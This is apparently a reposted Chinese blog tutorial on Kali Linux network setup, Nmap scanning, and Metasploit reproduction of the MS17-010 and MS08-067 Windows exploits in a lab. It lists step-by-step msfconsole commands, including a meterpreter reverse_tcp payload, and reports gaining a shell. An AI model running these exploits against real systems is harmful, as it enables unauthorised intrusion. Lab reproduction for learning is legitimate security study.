赞
踩
首先我们了解kali的网络设置
- DHCP:动态主机配置协议 是一个局域网的协议 使用UDP 协议工作
-
- 静态IP:用于大部分的中小型网络 通过网络管理员手动分配IP
- /etc 系统大部分服务启动过程都要访问该目录
-
- 我们直接去看看
-
- /ect/network/interfaces
- 这里就可以配置两个
-
- 1.DHCP:
-
- auto eth0
- iface eth0 inet dhcp //配置eth0使用DHCP协议
-
-
- 2.静态ip
-
- auto eth0
- iface eth0 inet static //配置eth0使用默认的静态地址
- address 192.168.0.90 //设置eth0的IP地址,根据需求配置
- gateway 192.168.0.1 //配置当前主机的默认网关,根据需求配置
- netmask 255.255.255.0 //配置eth0的子网掩码,根据需求配置
- resolv.conf中 可以配置3 个 nameserver
-
- 一旦前面失效 就会尝试下一个
- vi /etc/resolv.conf #进行DNS编辑
-
- nameserver 114.114.114.114 //国内移动、电信和联通通用的DNS
-
- nameserver 8.8.8.8 //是谷歌的IP地址
-
- nameserver 223.5.5.5 //是阿里云的IP地址
-
- nameserver 180.76.76.87 //是百度的IP地址
-
- 保存,退出
然后进行重启网络设置
sudo service networking restart
- NAT 网络地址转移模式
-
- Bridged 桥接模式
-
- Host-Only 主机模式
- NAT 就是虚拟系统会通过 宿主机 来访问外网
-
- 相当于主机存在两个网卡
-
- 一个是虚拟网卡 一个宿主机的网卡
-
- 当虚拟网卡想要访问外网的时候 就必须通过宿主机的IP地址
-
- 从外面看 就是宿主机的IP 是完全看不到虚拟环境的内部网络
-
- 这个时候
-
- 虚拟机和宿主机和虚拟交换机形成一个网段
-
- 宿主机和真实交换机形成一个网段
- 优点
-
- 不需要自己手动分配ip
-
- 只要宿主能访问即可
- 桥接模式就是 虚拟网卡和物理网卡通过 VMnet0虚拟交换机进行桥接
-
-
- 这个时候 VMnet0就相当于现实的交换机
-
- 他可以访问这个网络内的所有主机
-
- 但是需要手动设置 ip 子网掩码
-
- 这个模式中 可以互相ping
- 在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。
-
- 其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。
kali的网络设置及三种网络模式_kali配置网络_木_木的博客-CSDN博客
ctf工具Nmap使用教程图文教程(超详细)_ctf 端口扫描_程序员小麦的博客-CSDN博客
扫描主机开发的端口 与服务(默认是1000个端口)
nmap [ip]
这里将我本机的端口扫描出来了 并且显示了 每个端口的服务是什么
其中我们可以对主机进行指定端口扫描 通过 -p指令
- nmap 192.168.3.25 -p 80 单个
-
- nmap 192.168.3.25 -p 1-80 范围
-
- nmap 192.168.3.25 -p 80,3389,22,21 枚举
-
- nmap 192.168.3.25 -p 1-65535 范围
-
- nmap 192.168.3.25 -p- 相当于 1-65536
-sT 使用三次完整的握手来判断存活 否则失败
-sS 通过两次握手来 如果对方传回确认帧 那么就存活
- 可以扫描哪里主机存活
-
- -sP 不扫描端口 只扫描主机
-
- 其实实质上就是 ping 只要ping通 就说明存活
nmap 192.168.3.0/24 -sP
上面显示了 256个IP中存在3个活着的 主机
- 在扫描端口的时候 会默认显示端口存在的服务
-
- 如果要查看服务的具体版本 就可以使用 -sV
nmap 192.168.3.25 -p 80 -sV
发现是 apache 的服务器
- -O 可以识别端口的主机的系统
-
- nmap 192.168.3.25 -p 80 -O
发现这里就显示 run在 win10上
我们可以通过 nmap 来探测防火墙的存在
nmap 192.168.3.25 -sF
- T4可以指定时序 0-5 级别越高 速度越快 越容易被防火墙ban
-
-
- nmap -F -T4 -P0
-
- -F 100个端口 -P0 无ping扫描
- nmap -sC -sV -Pn 192.168.3.25
-
- -sC 通过 nmap 脚本探测
-
- -Pn 进制ping 后扫描
-
- -sV 版本探测
nmap -A -v -T4 +IP
- MATESPLOIT(MSF)是个免费开源的 攻击框架
-
- 附带了很多已知 知名的漏洞
-
- 在刚刚MSF出现的时候 只要会使用 MSF 就可以对未打补丁或刚刚打补丁的进行攻击
-
在kali中自带了 MSF
所以我们只需要启动即可
msfconsole
这里对MSF的几个模块进行解释
- 1、Auxiliary(辅助模块)
-
- 收集信息 提供大量辅助的一个模块
-
- 2、Exploits(攻击模块)
-
- 通过调动漏洞 进行攻击
-
-
- 3、Payload(攻击载荷模块)
-
-
- 攻击成功后促使靶机运行的一段植入代码
-
- 4、Post (后渗透攻击模块)
-
-
- 收集更多信息或进一步访问被利用的目标系统
-
-
- 5、Encoders(编码模块)
-
-
- 就是通过 编码绕过
首先来了解一下基础的用法
【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客
- msfconsole
-
- 进入 msf框架
-
- search ms17_010
-
- 通过 search 命令查找漏洞
-
- use exploit/windows/smb/ms17_010_eternalblue
-
- 通过 use 进入模块
-
- info
-
- 查看设置
-
- set payload windows/x64/meterpreter/reverse_tcp
-
- 设置 攻击模块为 这个漏洞
-
- options
-
- 查看参数
-
- set RHOST 192.168.100.158
-
- 设置攻击对象
-
- run
-
- 进行攻击
-
大致就差不多是这样
首先准备win7 的 IP 地址 我这里是 192.168.222.133
我们先通过 nmap 查看 一个网段存活的主机
nmap -sS 192.168.222.0/24
发现存在 5 个 其中能发现我们要攻击的主机ip
133
那么我们就看看 他是什么系统的
nmap -O 192.168.222.133
然后使用 nmap的脚本查看存在什么漏洞
nmap --script=vuln 192.168.222.133
发现主角了 ms17-010 那么我们就请出MSF
- msfconsole
- search ms17-010
这里exp的都是漏洞利用模块的 auxiliary是辅助探测模块 所以我们先通过 辅助探测 看看存不存在漏洞
这里直接 use 3
然后看看info
发现了 这里rhosts没有设置 而且是必须设置的选项
那我们就设置 为 攻击目标的ip范围
注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
set rhosts 192.168.222.100-192.168.222.190
exploit
扫到了
那我们直接通过
Exploit漏洞利用模块 对目标进行攻击
set rhosts 192.168.222.133
然后run 即可
这样就成功拿到shell了
接下来复现另一个漏洞
ms08-067漏洞复现_ms08-067复现_老司机开代码的博客-CSDN博客
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。
首先需要一个 xp的系统 一样这里的ip为137
那我们直接开始
nmap -sS 192.168.222.0/24
我们看看什么系统
nmap -O 192.168.222.137
发现也无法确定 那我们直接就 通过脚本扫
nmap --script=vuln 192.168.222.137
扫到了 并且也存在永恒之蓝
那我们直接启动 msf
- msfconsole
-
- search MS08-067
- use 0
-
- options
- set RHOSTS 192.168.222.137
- show targets
- set target 34
-
- run
成功调用了cmd
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。